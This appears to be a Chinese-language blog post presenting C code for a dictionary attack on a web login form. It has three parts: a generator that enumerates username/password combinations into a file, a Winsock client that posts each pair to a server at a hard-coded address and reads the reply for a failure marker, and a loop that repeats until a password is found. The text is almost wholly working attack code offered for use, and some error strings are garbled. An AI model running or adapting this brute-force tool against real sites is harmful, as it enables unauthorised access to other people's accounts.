基于網(wǎng)頁(yè)的口令攻擊的實(shí)現(xiàn)

?1、攻擊字典實(shí)現(xiàn)（簡(jiǎn)單實(shí)現(xiàn)米丘，在已知口令位數(shù)前提下，且限制字典庫(kù)口令數(shù)目）：

#include

#include

#include

#define USERLEN 7

#define PASSLEN 9

#define SIZEOFTABLE 63

static char table[SIZEOFTABLE] = "1234567890QWERTYUIOPqwertyuiopasdfghjklASDFGHJKLmnbvcxzZXCVBNM";

int jinweiadd(int &count)

{

count++;

if(count==SIZEOFTABLE)

{

count = 0;

return 1;

}

return 0;

}

void addcount(int count[16])

{

for(int i = 0;i<16;i++)

{

if(jinweiadd(count[i]) == 0)

break;

}

}

//

void makeone_usps()

{

unsigned test=0;

char userpas[40]={0};

char *qian = "username=";

char *hou = "&password=";

int count[16] = {0};//做計(jì)數(shù)的數(shù)組

FILE *fp;

char *filename = "./字典.txt";

int j=0,t=0;

char user[8];

char pas[10];

int i = 0;

char huiche[2] = {'\r','\n'};

fp = fopen(filename,"wb");

while(1)

{

//chanshengbingchucun

for(j=0;j<7;j++)

{

user[j]=table[count[j]];

}

user[j] = 0;

for(j=8;j<17;j++)

{

pas[j-8]=table[count[j-1]];

}

pas[j-8] = 0;

for(t=0;t<9;t++)

{

userpas[t] = qian[t];

}

for(;t<16;t++)

{

userpas[t] = user[t-9];

}

for(;t<26;t++)

{

userpas[t] = hou[t-16];

}

for(;t<36;t++)

{

userpas[t] = pas[t-26];

}

fwrite(userpas,sizeof(char),35,fp);

fwrite(huiche,sizeof(char),2,fp);

if(count[15]==SIZEOFTABLE-1)

break;

?addcount(count);

?test++;

?if(test==0xfffffff)

?break;

}

fclose(fp);

}

void getone_usps(char usrpas[],unsigned long &count)//count是從零開(kāi)始的

{

unsigned long i=0;

char mid;

FILE *fp;

char *filename = "./字典.txt";

fp = fopen(filename,"rb");

while(i

{

fread(&mid,sizeof(char),1,fp);

if(mid == '\n')

i++;

}

for(i=0;i<65;i++)

{

usrpas[i]=0;

}

for(i=0;i<65;i++)

{

fread(&mid,sizeof(char),1,fp);

if(mid == '\r')

break;

usrpas[i]=mid;

}

fclose(fp);

count++;

}

2、HTTP協(xié)議實(shí)現(xiàn)客戶端：

#include

#include

#pragma comment(lib,"ws2_32.lib")

int compare(char buffer[])

{

unsigned int i=0x182;

for(;i<1024;i++)

{

if((buffer[i]=='r')&&(buffer[i+1]=='e')&&(buffer[i+2]=='d'))

break;

i++;

}

if(i==1024)

return 1;

i+=8;

unsigned int a=(unsigned int)buffer[i]&0xff;

unsigned int b=(unsigned int)buffer[i+1]&0xff;

if(a==0xb2)

if(b==0xbb)

return 0;

return 1;//代表匹配

}

int testonce(char *usrpas,char ServerIPAddr[],int ServerPort)

{

int flag = -1;

FILE *fp;//,*fp1,*fp2;

int i=0,j=0;

//WSAData 數(shù)據(jù)結(jié)構(gòu)

WSADATA wsaData;

//客戶端套接字句柄

SOCKET ClientSocket;

//服務(wù)器地址

SOCKADDR_IN ServerAddr;

//發(fā)送數(shù)據(jù)

char SendData[1024];

fp = fopen("./前奏.txt","rb");

while(!feof(fp))

{

fread(&SendData[i],sizeof(char),1,fp);

i++;

}

i--;

int midsize = strlen(usrpas);

for(j = 0;j

{

SendData[i] = usrpas[j];

i++;

}

SendData[i] = 0;

fclose(fp);

char ReceiveBuffer[1024] = "";

int SendLength = -1;

int Result = -1;

//初始化 Winsock

if((Result = WSAStartup(MAKEWORD(2,2),&wsaData))!=0)

{

printf("WSAStartup 失旛锿铩！錯(cuò)誤代碼：%d\n",Result);

return -1;

}

ClientSocket = socket(AF_INET,//協(xié)議族

SOCK_STREAM,//流套接字類型

IPPROTO_TCP);//TCP協(xié)議

if(ClientSocket<0)

{

printf("socket 失斎赂ā簿姨！錯(cuò)誤代碼：%d\n",WSAGetLastError());

return -1;

}

memset(&ServerAddr,0,sizeof(ServerAddr));

//填充SOCKADDR_IN

//用來(lái)表示服務(wù)器的IP和端口

//協(xié)議族類型為AF_INET

ServerAddr.sin_family = AF_INET;

//設(shè)置服務(wù)器端口號(hào)

ServerAddr.sin_port = htons(ServerPort);

//設(shè)置服務(wù)器的IP地址

ServerAddr.sin_addr.s_addr = inet_addr(ServerIPAddr);

//連接服務(wù)器

Result = connect(ClientSocket,//套接字句柄

(SOCKADDR*)&ServerAddr,//服務(wù)器地址

sizeof(ServerAddr));//地址結(jié)構(gòu)長(zhǎng)度

if(Result<0)

{

printf("連接失敗！錯(cuò)誤代碼：%d\n",WSAGetLastError());

return -1;

}

//發(fā)送數(shù)據(jù)

SendLength = send(ClientSocket,//套接字句柄

SendData,//發(fā)送數(shù)據(jù)緩沖區(qū)

strlen(SendData),//長(zhǎng)度

0);//標(biāo)志為0

if(SendLength<0)

{

printf("發(fā)送失敱馕弧准潭！錯(cuò)誤代碼：%d\n",WSAGetLastError());

return -1;

}

//else

//printf("發(fā)送數(shù)據(jù)為：%s\n",SendData);

int ReceiveLen;

//清零

memset(ReceiveBuffer,0,sizeof(ReceiveBuffer));

//接收數(shù)據(jù)

if((ReceiveLen = recv(ClientSocket,ReceiveBuffer,1024,0))<0)

{

printf("接收失敗域仇！錯(cuò)誤代碼：%d\n",WSAGetLastError());

return -1;

}

else

{

//printf("接收數(shù)據(jù)為：%s\n",ReceiveBuffer);

if(compare(ReceiveBuffer)==1)

flag=1;

}

if(closesocket(ClientSocket)==SOCKET_ERROR)

{

printf("關(guān)閉socket失敗錯(cuò)誤代碼是%d\n",WSAGetLastError());

}

//釋放Winsock

if(WSACleanup() == SOCKET_ERROR)

{

printf("釋放Winsock失敗錯(cuò)誤代碼是%d\n",WSAGetLastError());

}

return flag;

}

3刑然、三次握手驗(yàn)證口令：

#include "Httptest.h"

#include "dic.h"

#include

int semfile1 = 0;

int semfile2 = 0;

unsigned long count=0;

int threadnum=0;

int numcount=0;

int success = 0;

char result[90];

int threadend=0;

DWORD WINAPI thread(LPVOID ptheread)

{

while(success ==0)

{

system("cls");

if(success !=0)

break;

printf("wait.");

_sleep(250);

system("cls");

if(success !=0)

break;

printf("wait..");

_sleep(250);

system("cls");

if(success !=0)

break;

printf("wait...");

_sleep(250);

system("cls");

if(success !=0)

break;

printf("wait....");

_sleep(250);

}

system("cls");

return 1;

}

void main()

{

char usrpas[65]="";

char ServerIPAddr[50] = "10.0.0.25";

int ServerPort = 80;

unsigned long numofdic=13;

DWORD threadid;

CreateThread(0,0,thread,0,0,&threadid);

while(count

{

getone_usps(usrpas,count);

int flag = testonce(usrpas,ServerIPAddr,ServerPort);

if(flag==1)

{

success = 1;

//printf("成功密碼為%s\n",usrpas);

break;

}

}

if(count == numofdic)

success = 2;

_sleep(500);

if(success == 1)

printf("成功密碼為%s\n",usrpas);

else

printf("字典庫(kù)中無(wú)合適的用戶名密碼\n");

return;

}